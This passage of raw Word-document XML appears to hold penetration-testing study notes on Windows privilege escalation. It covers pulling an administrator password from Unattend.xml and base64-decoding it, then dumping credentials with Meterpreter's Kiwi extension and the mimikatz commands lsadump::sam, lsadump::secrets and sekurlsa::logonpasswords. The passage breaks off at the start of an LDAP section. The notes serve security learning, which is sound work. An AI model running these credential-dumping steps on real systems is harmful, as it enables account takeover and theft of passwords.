          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“Invoke-PrivescAudit</w:t>
      </w:r>
      <w:r w:rsidR="00D33E9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DB9455" w14:textId="2FF5BD28" w:rsidR="005D4E2F" w:rsidRDefault="00E535B7" w:rsidP="007534AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“cat C:\</w:t>
      </w:r>
      <w:r w:rsidR="00B63225">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(PATH)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>\Unattend.xml”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463A82CF" w14:textId="5544356D" w:rsidR="004B5103" w:rsidRDefault="004B5103" w:rsidP="004B5103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Password should be located within this file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62704418" w14:textId="3A3AD18E" w:rsidR="00F2104C" w:rsidRDefault="00F2104C" w:rsidP="00F2104C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Could just pipe it into Cyberchef, but here’s a command to </w:t>
      </w:r>
      <w:r w:rsidR="00A07FA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>crack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> it in Powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754F628E" w14:textId="578A13D7" w:rsidR="00F2104C" w:rsidRDefault="00F2104C" w:rsidP="00F2104C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“$password=’(PASSWORD)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0549904A" w14:textId="2AC1DB29" w:rsidR="00F2104C" w:rsidRDefault="00F2104C" w:rsidP="00F2104C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“$password=[System.Text.Encoding]::UTF8.GetString(</w:t>
      </w:r>
      <w:r w:rsidR="00E4546B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>[System.Convert]::FromBase64String($password))”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EF60E2" w14:textId="318310B9" w:rsidR="00E4546B" w:rsidRPr="00C63B34" w:rsidRDefault="00E4546B" w:rsidP="00F2104C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“echo $password”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63215BD8" w14:textId="661BCE27" w:rsidR="007F69D1" w:rsidRDefault="00887A85" w:rsidP="00887A85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“runas.exe /user:administrator cmd”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05056FC4" w14:textId="50AB19D3" w:rsidR="00B63225" w:rsidRDefault="00B63225" w:rsidP="00B63225">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">After entering the password, it should give you a NT Sys auth </w:t>
      </w:r>
      <w:r w:rsidR="00C475C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>CMD shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9848D4" w14:textId="77777777" w:rsidR="005645C5" w:rsidRDefault="005645C5" w:rsidP="005645C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15834FE2" w14:textId="343DAF04" w:rsidR="005645C5" w:rsidRDefault="005645C5" w:rsidP="005645C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Dumping Hashes </w:t>
      </w:r>
      <w:r w:rsidR="001C6F7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7D4337" w14:textId="2736B1F3" w:rsidR="005645C5" w:rsidRDefault="001C6F7D" w:rsidP="001C6F7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Defacto hash dump method for Windows machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AFDD72" w14:textId="30F222E8" w:rsidR="001C6F7D" w:rsidRDefault="001C6F7D" w:rsidP="001C6F7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mimikatz is a Windows post-exploitation tool that allows for the extraction of clear-text passwords, hashes and Kerberos tickets from memories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A22C4CB" w14:textId="244C2EE6" w:rsidR="001C6F7D" w:rsidRDefault="001C6F7D" w:rsidP="001C6F7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mimikatz can be used to extract hashes from the lsass.exe process memory where hashes are cached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74FDC2" w14:textId="270A58D6" w:rsidR="001C6F7D" w:rsidRDefault="001C6F7D" w:rsidP="001C6F7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>We can utilize the pre-compiled mimikatz executable, alternatively, if we have access to a meterpreter session on a Windows target, we can utilize the inbuilt meterpreter extension Kiwi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17621D52" w14:textId="4DCC4A01" w:rsidR="001C6F7D" w:rsidRDefault="001C6F7D" w:rsidP="001C6F7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: Mimikatz will require elevated privileges </w:t>
      </w:r>
      <w:r w:rsidR="00A2552F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> run correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A517C82" w14:textId="5B6AFCF2" w:rsidR="00A2552F" w:rsidRDefault="000D635D" w:rsidP="00A2552F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Kiwi Extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C757FBE" w14:textId="2106BBA4" w:rsidR="00A2552F" w:rsidRDefault="00A2552F" w:rsidP="00A2552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Migrate to the LSASS process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE28192" w14:textId="5B345FEF" w:rsidR="00A2552F" w:rsidRDefault="00A2552F" w:rsidP="00A2552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“pgrep lsass” “migrate (PID)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F2922D" w14:textId="62082A10" w:rsidR="0008371E" w:rsidRDefault="0008371E" w:rsidP="0008371E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Load the Kiwi </w:t>
      </w:r>
      <w:r w:rsidR="00A80C0A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C37AA05" w14:textId="7B0895C8" w:rsidR="00A80C0A" w:rsidRDefault="00A80C0A" w:rsidP="00A80C0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“load kiwi”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11363ECB" w14:textId="24194C38" w:rsidR="001365C7" w:rsidRDefault="001365C7" w:rsidP="00A80C0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiwi commands will now all be </w:t>
      </w:r>
      <w:r w:rsidR="008C72F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>within the Meterpreter help output.</w:t>
      </w:r>
      <w:r w:rsidR="00E25F77">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88CD57" w14:textId="6C1FA03D" w:rsidR="00E25F77" w:rsidRDefault="00E25F77" w:rsidP="00E25F77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“creds_all”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57954B00" w14:textId="1004BBF1" w:rsidR="00E25F77" w:rsidRDefault="00E25F77" w:rsidP="00E25F77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Dump some </w:t>
      </w:r>
      <w:r w:rsidR="00363211">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>creds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, particularly of the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4537F58B" w14:textId="4D3719DE" w:rsidR="00E25F77" w:rsidRDefault="00E25F77" w:rsidP="00E25F77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“lsa</w:t>
      </w:r>
      <w:r w:rsidR="00C14F30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>_dump_sam”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C0FF3E" w14:textId="64366410" w:rsidR="006B7E1F" w:rsidRPr="006B7E1F" w:rsidRDefault="00C14F30" w:rsidP="006B7E1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dump some more hashes from the LSA SAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDC25F3" w14:textId="77777777" w:rsidR="000D635D" w:rsidRDefault="000D635D" w:rsidP="000D635D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C1C883" w14:textId="77777777" w:rsidR="00852A15" w:rsidRDefault="00852A15" w:rsidP="000D635D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5507B5F2" w14:textId="77777777" w:rsidR="00852A15" w:rsidRDefault="00852A15" w:rsidP="000D635D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65EB8BB8" w14:textId="1FFFA3C3" w:rsidR="000D635D" w:rsidRDefault="000D635D" w:rsidP="000D635D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA5DDE0" w14:textId="0BF9B641" w:rsidR="000D635D" w:rsidRDefault="000D635D" w:rsidP="000D635D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“mkdir Temp”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E28A56D" w14:textId="4870F8F4" w:rsidR="00852A15" w:rsidRDefault="00852A15" w:rsidP="000D635D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45339427" w14:textId="5EC5BABB" w:rsidR="004923B8" w:rsidRDefault="004923B8" w:rsidP="004923B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“shell”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ADB10D" w14:textId="1F9575CE" w:rsidR="004923B8" w:rsidRDefault="004923B8" w:rsidP="004923B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“.\mimikatz.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AB6632" w14:textId="44161427" w:rsidR="004923B8" w:rsidRDefault="00696B2E" w:rsidP="004923B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“# privilege::debug”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E46ACF" w14:textId="77777777" w:rsidR="00696B2E" w:rsidRDefault="00696B2E" w:rsidP="00696B2E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E34EF21" w14:textId="16EAC639" w:rsidR="00205745" w:rsidRPr="00205745" w:rsidRDefault="00696B2E" w:rsidP="00205745">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00205745">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>lsadump::sam”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1607C5" w14:textId="4F113916" w:rsidR="00205745" w:rsidRDefault="00205745" w:rsidP="00696B2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“# lsadump::secrets”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292A15F5" w14:textId="61D7908E" w:rsidR="006B7E1F" w:rsidRDefault="006B7E1F" w:rsidP="006B7E1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“# sekurlsa::logonpasswords”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3677AEE3" w14:textId="77777777" w:rsidR="00933241" w:rsidRDefault="00933241" w:rsidP="00933241">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3E056B" w14:textId="1AAFCED1" w:rsidR="00824816" w:rsidRDefault="00824816" w:rsidP="00933241">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LDAP (Lightweight Directory Access Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEFADAC" w14:textId="1801B478" w:rsidR="001E5C7D" w:rsidRDefault="001E5C7D" w:rsidP="00933241">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>LDAP is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet</w:t>
      </w:r>
      <w:r w:rsidR="00960558">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A8D3E0" w14:textId="70C35BFE" w:rsidR="00960558" w:rsidRDefault="00960558" w:rsidP="00933241">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Ports – 389, 636, 3268, 3269</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A2860B" w14:textId="0502A349" w:rsidR="001D2AC1" w:rsidRDefault="001D2AC1" w:rsidP="001D2AC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
